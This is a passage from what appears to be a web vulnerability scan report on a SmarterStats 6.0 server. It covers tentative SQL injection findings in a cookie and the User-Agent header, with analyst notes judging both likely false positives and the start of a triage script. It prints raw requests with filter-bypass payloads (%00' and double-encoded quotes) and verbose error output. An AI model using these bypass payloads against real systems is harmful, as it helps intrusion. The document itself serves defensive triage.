&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteSettingInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;ConfigLogLocation d5p1:nil="true" xmlns:d5p1="http://www.w3.org/2001/XMLSchema-instance" /&gt;
&lt;/LogLocations&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;/Sites&gt;
&lt;/SiteSettingInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

2.15. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters being blocked, as in the %00' and %00'' payloads in the requests below.

Note on confidence. The "general error" in Response 1 is System.InvalidOperationException: Collection was modified; enumeration operation may not execute, thrown from System.Xml.Serialization.XmlSchemas.Compile while ASP.defaultwsdlhelpgenerator_aspx.Page_Load builds the WSDL help page for ?op=MoveSite. No data-access frame (SqlClient, OleDb, Odbc) appears anywhere in the stack trace, and the help page itself issues no query. A Hashtable enumerator failing this way typically means another thread modified the collection mid-enumeration, which is what a scanner hitting the help generator with many concurrent requests tends to provoke, so the one-quote/two-quote difference is more plausibly timing noise than quote-sensitive SQL. Treat this finding as unconfirmed until a database error, or a boolean or time-based differential, is reproduced in isolation against the same cookie. What the 500 response does establish is verbose error disclosure: the full stack trace and the .NET Framework/ASP.NET version (4.0.30319) are returned in the body. Check from a remote client whether customErrors suppresses this, because the help page's form action (http://localhost:9999/...) suggests this scan was run on the server itself.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00'; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=MoveSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=%00''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:13 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14519
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>MoveSite</h2>
<p class="intro">Moves one site from one Server to another Server listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/MoveSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestServerID:</td>
<td><input class="frmInput" type="text" size="50" name="DestServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestSmarterLogPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestSmarterLogPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestLogFilePath:</td>
<td><input class="frmInput" type="text" size="50" name="DestLogFilePath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DestExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="DestExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">CopyFiles:</td>
<td><input class="frmInput" type="text" size="50" name="CopyFiles"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/MoveSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DestServerID&gt;<font class=value>int</font>&lt;/DestServerID&gt;
&lt;DestSmarterLogPath&gt;<font class=value>string</font>&lt;/DestSmarterLogPath&gt;
&lt;DestLogFilePath&gt;<font class=value>string</font>&lt;/DestLogFilePath&gt;
&lt;DestExportPath&gt;<font class=value>string</font>&lt;/DestExportPath&gt;
&lt;DestExportPathURL&gt;<font class=value>string</font>&lt;/DestExportPathURL&gt;
&lt;CopyFiles&gt;<font class=value>boolean</font>&lt;/CopyFiles&gt;
&lt;/MoveSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;MoveSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;MoveSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/MoveSiteResult&gt;
&lt;/MoveSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/MoveSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/MoveSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DestServerID</font>=<font class=value>string</font>&amp;<font class=key>DestSmarterLogPath</font>=<font class=value>string</font>&amp;<font class=key>DestLogFilePath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPath</font>=<font class=value>string</font>&amp;<font class=key>DestExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>CopyFiles</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.16. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent header and a general error message was returned; two single quotes were then submitted and the error message disappeared. Review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by double URL-encoding the blocked characters, for example by submitting %2527 instead of the ' character, as in the %2527 and %2527%2527 payloads in the requests below.

Note on confidence. Response 1 is the same System.InvalidOperationException from the WSDL help generator (ASP.defaultwsdlhelpgenerator_aspx.Page_Load calling XmlSchemas.Compile) seen in finding 2.15, with no data-access frame in the stack trace; it was raised while rendering the help page for ?op=AddSiteWithFTP2, a page that runs no query. The User-Agent value also never left its percent-encoded form, since HTTP servers do not URL-decode header values, so the application would have had to decode the header itself before a quote could exist. Treat this as a likely scanner false positive unless a database error or a boolean/time-based differential can be reproduced in isolation.

Remediation detail

HTTP header values are not URL-decoded by the web server, so %2527 reaches the application as the literal six characters; the sequence can only become a quote if the application URL-decodes User-Agent itself, and there is no legitimate reason for it to do so. Remove any such decoding, perform input validation after all custom canonicalisation has been carried out, and confirm whether the header is ever used in a query at all.
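A triage script for findings 2.15 and 2.16 follows. It is an added example, not part of the original scan report and not SmarterTools code. It rebuilds the two payload variants the report sent (a %00 prefix and double URL-encoding of the quote), applies the same one-quote/two-quote differential the scanner used, and then inspects the error page that came back to decide whether it is a database exception at all. The two sample responses are constructed from the 500 and 200 responses printed in these findings; the SQL error page is a constructed contrast case and was not observed against SmarterStats.

```python
"""Triage a quote/double-quote SQL injection heuristic against ASP.NET error pages.

Added example for findings 2.15 and 2.16; not code from the scan report or
from SmarterStats. The sample HTTP bodies below are constructed from the
responses shown in the report; SQL_500 is a constructed contrast case.
"""
import re
from urllib.parse import quote

# Exception types and message fragments that show the database layer actually
# saw the quote. Anything else is an application-level error.
SQL_ERROR_MARKERS = (
    "System.Data.SqlClient.SqlException",
    "System.Data.OleDb.OleDbException",
    "System.Data.Odbc.OdbcException",
    "System.Data.SQLite.SQLiteException",
    "MySql.Data.MySqlClient.MySqlException",
    "Unclosed quotation mark",
    "Incorrect syntax near",
)

# Constructed from Response 1 of finding 2.15, trimmed to the parts that matter.
ASPNET_500 = """<html><head>
<title>Collection was modified; enumeration operation may not execute.</title></head>
<body><span><H1>Server Error in '/' Application.</H1>
<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>
<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>
<b>Stack Trace:</b> <pre>
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
</pre></body></html>"""

# Constructed from Response 2 of finding 2.15: the normal MoveSite help page.
HELP_PAGE_200 = """<html><head><title>SiteAdmin Web Service</title></head>
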